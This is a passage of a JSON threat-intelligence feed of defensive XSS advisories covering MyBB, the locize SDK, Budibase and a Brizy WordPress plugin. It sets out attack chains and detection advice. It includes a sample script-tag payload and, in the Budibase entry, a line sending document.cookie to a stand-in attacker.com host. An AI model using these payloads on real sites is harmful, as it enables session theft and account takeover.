\u003ccode\u003e\u0026lt;script\u0026gt;alert(\u0026quot;XSS\u0026quot;)\u0026lt;/script\u0026gt;\u003c/code\u003e).\u003c/li\u003e\n\u003cli\u003eAttacker submits the crafted thread subject when creating a new thread on the MyBB forum.\u003c/li\u003e\n\u003cli\u003eThe MyBB application stores the malicious subject in the database without proper sanitization.\u003c/li\u003e\n\u003cli\u003eA user visits the forum\u0026rsquo;s index page or any page that displays the thread\u0026rsquo;s subject.\u003c/li\u003e\n\u003cli\u003eThe MyBB application retrieves the thread subject from the database and injects it into the HTML of the page.\u003c/li\u003e\n\u003cli\u003eThe user\u0026rsquo;s browser parses the HTML and executes the injected JavaScript code.\u003c/li\u003e\n\u003cli\u003eThe attacker\u0026rsquo;s JavaScript code performs malicious actions, such as stealing cookies or redirecting the user to a malicious website.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation of this XSS vulnerability can lead to various impacts, including session hijacking, where an attacker steals a user\u0026rsquo;s session cookie and gains unauthorized access to their account. Website defacement is also possible, where the attacker alters the appearance of the forum. In a targeted attack, the attacker could potentially gain control over the MyBB server itself, depending on the permissions of the user whose session is hijacked and the server configuration. Given the popularity of MyBB, a successful exploit could affect numerous forums and their users.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eDeploy the Sigma rule \u003ccode\u003eDetect MyBB XSS via Thread Title\u003c/code\u003e to identify potential exploitation attempts by detecting script tags in HTTP request parameters to thread creation endpoints.\u003c/li\u003e\n\u003cli\u003eInspect web server logs for HTTP requests containing \u003ccode\u003e\u0026lt;script\u0026gt;\u003c/code\u003e tags in the \u003ccode\u003esubject\u003c/code\u003e parameter when creating a new thread, as this is indicative of a potential XSS attack (see references for vulnerable parameter).\u003c/li\u003e\n\u003cli\u003eUpgrade MyBB installations to a patched version that includes proper input sanitization to prevent XSS vulnerabilities.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2024-01-02T12:00:00Z","date_published":"2024-01-02T12:00:00Z","id":"/briefs/2024-01-mybb-xss/","summary":"MyBB Recent threads 17.0 contains a persistent cross-site scripting vulnerability (CVE-2018-25309) that allows attackers to inject malicious scripts by creating threads with crafted subject lines, leading to arbitrary JavaScript execution in the browsers of users viewing the index page.","title":"MyBB Recent Threads 17.0 Persistent Cross-Site Scripting Vulnerability (CVE-2018-25309)","url":"https://feed.craftedsignal.io/briefs/2024-01-mybb-xss/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":["locize client SDK"],"_cs_severities":["high"],"_cs_tags":["xss","dom-xss","postMessage","locize","javascript"],"_cs_type":"advisory","_cs_vendors":["locize"],"content_html":"\u003cp\u003eThe locize client SDK, a browser module integrating the locize InContext translation editor, contains a cross-origin vulnerability in versions prior to 4.0.21. The vulnerability stems from the SDK\u0026rsquo;s failure to validate the \u003ccode\u003eevent.origin\u003c/code\u003e property when handling \u003ccode\u003ewindow.addEventListener(\u0026quot;message\u0026quot;)\u003c/code\u003e events. This allows a malicious webpage sharing a window reference with a locize-enabled host (e.g., via an iframe) to send crafted \u003ccode\u003epostMessage\u003c/code\u003e calls, triggering internal handlers without proper authorization. Successful exploitation can lead to DOM-based XSS, hijacking of the \u003ccode\u003eapi.source\u003c/code\u003e and \u003ccode\u003eapi.origin\u003c/code\u003e properties, and CSS injection, potentially compromising the confidentiality and integrity of the application. This vulnerability was discovered via an internal security audit of the locize ecosystem.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eAn attacker hosts a malicious webpage with the intent to exploit a locize-enabled application.\u003c/li\u003e\n\u003cli\u003eThe locize-enabled application embeds the attacker\u0026rsquo;s page as an iframe or has a \u003ccode\u003ewindow.opener\u003c/code\u003e/\u003ccode\u003ewindow.open\u003c/code\u003e relationship with it.\u003c/li\u003e\n\u003cli\u003eThe attacker crafts a \u003ccode\u003epostMessage\u003c/code\u003e with a \u003ccode\u003esender\u003c/code\u003e field equal to \u003ccode\u003e\u0026quot;i18next-editor-frame\u0026quot;\u003c/code\u003e and a malicious payload targeted at specific handlers.\u003c/li\u003e\n\u003cli\u003eThe locize SDK\u0026rsquo;s \u003ccode\u003ewindow.addEventListener(\u0026quot;message\u0026quot;)\u003c/code\u003e handler receives the message and, without validating \u003ccode\u003eevent.origin\u003c/code\u003e, dispatches it to the internal handlers.\u003c/li\u003e\n\u003cli\u003eIf the attacker targets the \u003ccode\u003eeditKey\u003c/code\u003e or \u003ccode\u003ecommitKeys\u003c/code\u003e handlers, the attacker-controlled payload values are assigned to \u003ccode\u003eitem.node.innerHTML\u003c/code\u003e or \u003ccode\u003eitem.node.setAttribute(attr, value)\u003c/code\u003e, injecting malicious scripts or HTML.\u003c/li\u003e\n\u003cli\u003eIf the attacker targets the \u003ccode\u003eisLocizeEnabled\u003c/code\u003e handler, the \u003ccode\u003eapi.source\u003c/code\u003e and \u003ccode\u003eapi.origin\u003c/code\u003e are hijacked, redirecting subsequent messages to the attacker\u0026rsquo;s window and exfiltrating translation content.\u003c/li\u003e\n\u003cli\u003eIf the attacker targets the \u003ccode\u003erequestPopupChanges\u003c/code\u003e handler, malicious CSS code is injected into the popup\u0026rsquo;s inline style.\u003c/li\u003e\n\u003cli\u003eThe attacker gains unauthorized access to sensitive data or injects malicious content into the locize-enabled application, impacting its integrity and confidentiality.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation of this vulnerability can lead to several critical consequences. Cross-origin DOM XSS allows arbitrary code execution within the context of the vulnerable application. Hijacking \u003ccode\u003eapi.source\u003c/code\u003e and \u003ccode\u003eapi.origin\u003c/code\u003e results in the leakage of translation content and metadata to the attacker, compromising sensitive information. CSS injection can alter the visual appearance of the application, potentially leading to phishing attacks or further exploitation. The number of victims depends on the adoption rate of vulnerable locize SDK versions prior to 4.0.21.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eUpgrade to \u003ccode\u003elocize\u003c/code\u003e client SDK version 4.0.21 or later to patch the vulnerability. This version implements \u003ccode\u003eevent.origin\u003c/code\u003e validation in \u003ccode\u003esrc/api/postMessage.js\u003c/code\u003e, mitigating the risk of cross-origin attacks.\u003c/li\u003e\n\u003cli\u003eDeploy the Sigma rule \u0026ldquo;Detect Locize Client SDK DOM XSS Attempt via postMessage\u0026rdquo; to identify exploitation attempts based on manipulation of \u003ccode\u003einnerHTML\u003c/code\u003e or \u003ccode\u003esetAttribute\u003c/code\u003e in the locize context.\u003c/li\u003e\n\u003cli\u003eEnable web server logging and monitor for suspicious \u003ccode\u003epostMessage\u003c/code\u003e events originating from unexpected domains to detect potential exploitation attempts targeting the locize SDK.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2024-01-02T12:00:00Z","date_published":"2024-01-02T12:00:00Z","id":"/briefs/2024-01-02-locize-xss/","summary":"The locize client SDK versions prior to 4.0.21 are vulnerable to cross-origin DOM XSS and handler hijack due to missing origin validation in the InContext Editor, allowing attackers to inject malicious code and exfiltrate data via crafted postMessage events.","title":"locize Client SDK Cross-Origin DOM XSS and Handler Hijack Vulnerability","url":"https://feed.craftedsignal.io/briefs/2024-01-02-locize-xss/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":["Budibase (versions prior to 3.35.10)"],"_cs_severities":["high"],"_cs_tags":["xss","account takeover","jwt","cookie"],"_cs_type":"advisory","_cs_vendors":["Budibase"],"content_html":"\u003cp\u003eBudibase, a low-code platform, is vulnerable to account takeover due to the insecure configuration of its authentication cookie. The \u003ccode\u003ebudibase:auth\u003c/code\u003e cookie, which stores the JWT session token, is set without the \u003ccode\u003ehttpOnly\u003c/code\u003e flag. This allows JavaScript, including malicious scripts injected via Cross-Site Scripting (XSS) vulnerabilities like GHSA-gp5x-2v54-v2q5, to access the cookie\u0026rsquo;s contents.  An attacker exploiting this can steal the JWT and use it to impersonate the victim, gaining persistent access to their account.  Furthermore, the cookie lacks the \u003ccode\u003esecure\u003c/code\u003e and \u003ccode\u003esameSite\u003c/code\u003e attributes, exacerbating the risk. This vulnerability affects all Budibase deployments running versions prior to 3.35.10, as the insecure cookie configuration is hardcoded in the backend.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eAttacker identifies a Budibase instance running a vulnerable version (prior to 3.35.10).\u003c/li\u003e\n\u003cli\u003eAttacker exploits an existing XSS vulnerability, such as the stored XSS via unsanitized entity names (GHSA-gp5x-2v54-v2q5).\u003c/li\u003e\n\u003cli\u003eThe attacker crafts a malicious JavaScript payload designed to read the \u003ccode\u003ebudibase:auth\u003c/code\u003e cookie using \u003ccode\u003edocument.cookie\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003eThe injected JavaScript executes within the victim\u0026rsquo;s browser when they interact with the application (e.g., viewing an entity with a malicious name).\u003c/li\u003e\n\u003cli\u003eThe malicious script retrieves the JWT session token from the \u003ccode\u003ebudibase:auth\u003c/code\u003e cookie.\u003c/li\u003e\n\u003cli\u003eThe script exfiltrates the stolen JWT to an attacker-controlled server, for example, by sending it as a URL parameter in an image request: \u003ccode\u003enew Image().src = 'https://attacker.com/steal?cookie=' + encodeURIComponent(document.cookie);\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003eThe attacker uses the stolen JWT to authenticate to the Budibase application, bypassing normal login procedures.\u003c/li\u003e\n\u003cli\u003eThe attacker gains persistent access to the victim\u0026rsquo;s account and can perform actions as the victim, including accessing sensitive data, modifying application configurations, and creating new malicious entities.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eThe lack of the \u003ccode\u003ehttpOnly\u003c/code\u003e flag on the \u003ccode\u003ebudibase:auth\u003c/code\u003e cookie transforms every XSS vulnerability in Budibase into a critical account takeover risk. Attackers can persistently compromise user accounts, leading to potential data breaches, unauthorized application modifications, and further propagation of malicious content. This impacts all Budibase deployments running vulnerable versions, potentially affecting a wide range of organizations using the platform for their internal applications and workflows. The vulnerability allows attackers to bypass authentication controls and gain full control over compromised accounts.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eUpgrade Budibase to version 3.35.10 or later to address the insecure cookie configuration in \u003ccode\u003epackages/backend-core/src/utils/utils.ts\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003eDeploy the following Sigma rule to detect potential JWT theft attempts via unusual network connections originating from the browser.\u003c/li\u003e\n\u003cli\u003eReview and remediate all existing XSS vulnerabilities within your Budibase applications, as they can now lead to full account takeover.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2024-01-02T12:00:00Z","date_published":"2024-01-02T12:00:00Z","id":"/briefs/2024-01-budibase-account-takeover/","summary":"The `budibase:auth` cookie in Budibase is set without the `httpOnly` flag, enabling attackers with XSS to steal JWTs and gain persistent access to user accounts.","title":"Budibase XSS Leads to Account Takeover via JWT Theft","url":"https://feed.craftedsignal.io/briefs/2024-01-budibase-account-takeover/"},{"_cs_actors":[],"_cs_cves":[{"cvss":7.2,"id":"CVE-2026-5324"}],"_cs_exploited":false,"_cs_products":["Brizy – Page Builder plugin \u003c= 2.8.11"],"_cs_severities":["medium"],"_cs_tags":["wordpress","xss","unauthenticated"],"_cs_type":"advisory","_cs_vendors":["WordPress"],"content_html":"\u003cp\u003eThe Brizy – Page Builder plugin for WordPress, a popular tool for designing website pages, contains a critical vulnerability that allows unauthenticated users to inject malicious JavaScript code. Specifically, versions up to and including 2.8.11 are affected. This vulnerability arises from a combination of factors, including the lack of nonce verification for form submissions from non-logged-in users, inadequate handling of FileUpload fields when no file is actually uploaded, and the unintended reversal of security encoding through \u003ccode\u003ehtml_entity_decode()\u003c/code\u003e before outputting data. This allows attackers to inject arbitrary web scripts that execute in the context of a logged-in administrator viewing the form\u0026rsquo;s \u0026ldquo;Leads\u0026rdquo; page, potentially leading to account takeover, data theft, or further compromise of the WordPress site.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eAn unauthenticated attacker crafts a malicious payload containing JavaScript code.\u003c/li\u003e\n\u003cli\u003eThe attacker submits this payload through a Brizy form on the WordPress site, exploiting the missing nonce verification in the \u003ccode\u003esubmit_form()\u003c/code\u003e function.\u003c/li\u003e\n\u003cli\u003eThe \u003ccode\u003ehandleFileTypeFields()\u003c/code\u003e function fails to properly sanitize or overwrite the attacker-supplied values when no file is attached to the form submission.\u003c/li\u003e\n\u003cli\u003eThe injected payload, now stored in the WordPress database, bypasses initial \u003ccode\u003ehtmlentities()\u003c/code\u003e encoding due to later \u003ccode\u003ehtml_entity_decode()\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003eAn administrator logs into the WordPress dashboard and navigates to the \u0026ldquo;Leads\u0026rdquo; page to view form submissions.\u003c/li\u003e\n\u003cli\u003eThe form-data.php template retrieves the stored malicious payload from the database.\u003c/li\u003e\n\u003cli\u003eThe payload is outputted directly within the \u003ccode\u003ehref\u003c/code\u003e attribute of an HTML element without proper escaping using \u003ccode\u003eesc_url()\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003eThe injected JavaScript code executes within the administrator\u0026rsquo;s browser, potentially performing actions such as stealing cookies or redirecting the administrator to a malicious site.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation of this vulnerability allows an unauthenticated attacker to execute arbitrary JavaScript code in the context of a logged-in administrator\u0026rsquo;s browser. This could lead to a full compromise of the WordPress site, including the ability to create new administrative accounts, modify existing content, inject malware into the site\u0026rsquo;s pages, or steal sensitive data. The impact is significant, as it requires no user interaction beyond an administrator viewing the form submissions within the Brizy plugin.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eUpgrade the Brizy – Page Builder plugin to the latest version to patch CVE-2026-5324.\u003c/li\u003e\n\u003cli\u003eDeploy the Sigma rule \u0026ldquo;Detect Brizy WordPress Plugin XSS Attempt via HTTP Request\u0026rdquo; to identify potential exploitation attempts in web server logs.\u003c/li\u003e\n\u003cli\u003eReview the \u003ccode\u003eform-data.php\u003c/code\u003e template and implement proper output escaping using \u003ccode\u003eesc_url()\u003c/code\u003e for all user-supplied data to prevent XSS, as mentioned in the vulnerability description.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2024-01-02T12:00:00Z","date_published":"2024-01-02T12:00:00Z","id":"/briefs/2024-01-brizy-xss/","summary":"The Brizy – Page Builder plugin for WordPress is vulnerable to Unauthenticated Stored Cross-Site Scripting (XSS) in versions up to and including 2.8.11, allowing unauthenticated attackers to inject arbitrary web scripts that execute when an administrator views the form Leads page due to missing nonce verification and improper handling of file upload fields.","title":"Brizy WordPress Plugin Unauthenticated Stored XSS Vulnerability","url":"https://feed.craftedsignal.io/briefs/2024-01-brizy-xss/"}],"language":"en","title":"CraftedSignal Threat Feed — Xss","version":"https://jsonfeed.org/version/1.1"}